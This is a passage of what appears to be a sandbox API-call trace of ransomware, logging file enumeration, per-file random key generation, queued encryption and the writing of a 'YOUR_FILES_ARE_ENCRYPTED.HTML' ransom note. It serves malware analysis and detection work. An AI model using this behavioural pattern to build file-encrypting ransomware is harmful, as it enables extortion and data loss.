param_1=0x4ebd166, param_2="%02X" | out: param_1="74") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: 
param_1="4F") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="AC") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="5A") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="EF") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="DF") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="30") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="5D") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="CA") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="2E") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="6E") returned 2 [0163.814] lstrcpyW (in: lpString1=0x756a4d4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" [0163.814] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x755a420, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.814] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a420, lpOverlapped=0x755a420) returned 1 [0163.814] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x42016184, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, 
cFileName="Shades of Blue.htm", cAlternateFileName="SHADES~1.HTM")) returned 1 [0163.815] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 90 [0163.815] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.815] PathFindExtensionW (pszPath="Shades of Blue.htm") returned=".htm" [0163.815] lstrlenW (lpString=".htm") returned 4 [0163.815] PathFindExtensionW (pszPath="Shades of Blue.htm") returned=".htm" [0163.815] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0163.815] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0163.815] CloseHandle (hObject=0x5a8) returned 1 [0163.815] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82949f3c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShadesOfBlue.jpg", cAlternateFileName="SHADES~1.JPG")) returned 1 [0163.815] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\ShadesOfBlue.jpg") returned 88 [0163.815] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.815] PathFindExtensionW (pszPath="ShadesOfBlue.jpg") returned=".jpg" [0163.815] lstrlenW (lpString=".jpg") returned 4 [0163.815] PathFindExtensionW (pszPath="ShadesOfBlue.jpg") returned=".jpg" [0163.815] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0163.817] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4734) returned 1 [0163.817] GetProcessHeap () returned 0x270000 [0163.817] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7582578 [0163.821] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="B1") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="68") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="34") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="F5") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="26") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="A9") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="4E") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="C7") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="8C") returned 2 [0163.821] wsprintfW (in: 
param_1=0x4ebd136, param_2="%02X" | out: param_1="FF") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="41") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="D6") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="8E") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="E5") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="F6") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="68") returned 2 [0163.821] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="3F") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="E1") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="98") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="7F") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="04") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="00") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="02") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="C9") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="99") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="2E") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="A3") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="40") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="C2") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="3B") returned 2 [0163.822] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="E8") returned 2 
[0163.822] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="29") returned 2 [0163.823] lstrcpyW (in: lpString1=0x759262c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" [0163.823] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x7582578, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.823] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7582578, lpOverlapped=0x7582578) returned 1 [0163.823] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24c1090, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x42062444, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Soft Blue.htm", cAlternateFileName="SOFTBL~1.HTM")) returned 1 [0163.823] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 85 [0163.823] lstrcmpW (lpString1="Soft Blue.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.823] PathFindExtensionW (pszPath="Soft Blue.htm") returned=".htm" [0163.823] lstrlenW (lpString=".htm") returned 4 [0163.823] PathFindExtensionW (pszPath="Soft Blue.htm") returned=".htm" [0163.823] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.823] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5bc [0163.823] GetFileSizeEx (in: hFile=0x5bc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=232) returned 1 [0163.823] CloseHandle (hObject=0x5bc) returned 1 [0163.823] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24c1090, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829961fc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0163.823] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 84 [0163.824] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.824] PathFindExtensionW (pszPath="SoftBlue.jpg") returned=".jpg" [0163.824] lstrlenW (lpString=".jpg") returned 4 [0163.824] PathFindExtensionW (pszPath="SoftBlue.jpg") returned=".jpg" [0163.824] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5bc [0163.824] GetFileSizeEx (in: hFile=0x5bc, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=10569) returned 1 [0163.824] GetProcessHeap () returned 0x270000 [0163.824] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa6d0 [0163.828] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="92") returned 2 [0163.828] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="87") returned 2 [0163.828] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="29") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="04") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="8E") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="87") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="0F") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="F1") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="A8") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="BE") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="53") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="DF") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="61") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="BA") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="00") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="83") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="20") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="6F") returned 
2 [0163.829] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="63") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="94") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="E3") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="52") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="03") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="AB") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="9D") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="EF") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="5E") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="05") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="78") returned 2 [0163.829] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="CD") returned 2 [0163.830] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="32") returned 2 [0163.830] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0E") returned 2 [0163.830] lstrcpyW (in: lpString1=0x75ba784, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" [0163.830] CreateIoCompletionPort (FileHandle=0x5bc, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa6d0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.830] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa6d0, lpOverlapped=0x75aa6d0) returned 1 [0163.830] 
FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x420ae704, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0163.830] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 81 [0163.830] lstrcmpW (lpString1="Stars.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.830] PathFindExtensionW (pszPath="Stars.htm") returned=".htm" [0163.830] lstrlenW (lpString=".htm") returned 4 [0163.830] PathFindExtensionW (pszPath="Stars.htm") returned=".htm" [0163.830] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c0 [0163.831] GetFileSizeEx (in: hFile=0x5c0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=230) returned 1 [0163.831] CloseHandle (hObject=0x5c0) returned 1 [0163.831] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24c1090, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0x829bc35c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0163.831] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 81 [0163.831] lstrcmpW (lpString1="Stars.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.831] PathFindExtensionW (pszPath="Stars.jpg") returned=".jpg" [0163.831] lstrlenW (lpString=".jpg") returned 4 [0163.831] PathFindExtensionW (pszPath="Stars.jpg") returned=".jpg" [0163.831] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c0 [0163.832] GetFileSizeEx (in: hFile=0x5c0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=7505) returned 1 [0163.832] GetProcessHeap () returned 0x270000 [0163.832] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7600058 [0163.836] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="02") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="6A") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="76") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="57") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="F1") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | 
out: param_1="42") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="2B") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="37") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="4E") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="34") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="4B") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="64") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="C1") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="AD") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="C8") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="A8") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="28") returned 2 [0163.836] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="D7") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="B4") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="82") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="74") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="A9") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="9F") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="C0") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="AF") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="EE") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="34") returned 2 [0163.837] wsprintfW (in: 
param_1=0x4ebd17e, param_2="%02X" | out: param_1="5F") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="08") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="42") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="C1") returned 2 [0163.837] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="7B") returned 2 [0163.837] lstrcpyW (in: lpString1=0x761010c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" [0163.838] CreateIoCompletionPort (FileHandle=0x5c0, ExistingCompletionPort=0x3a0, CompletionKey=0x7600058, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.838] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7600058, lpOverlapped=0x7600058) returned 1 [0163.838] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24c1090, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829bc35c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 0 [0163.838] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.838] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0163.838] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.838] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.840] CloseHandle (hObject=0x58c) returned 1 [0163.841] GetProcessHeap () returned 0x270000 [0163.842] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.842] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd49a6590, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x204000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0163.842] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 87 [0163.842] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.842] PathFindExtensionW 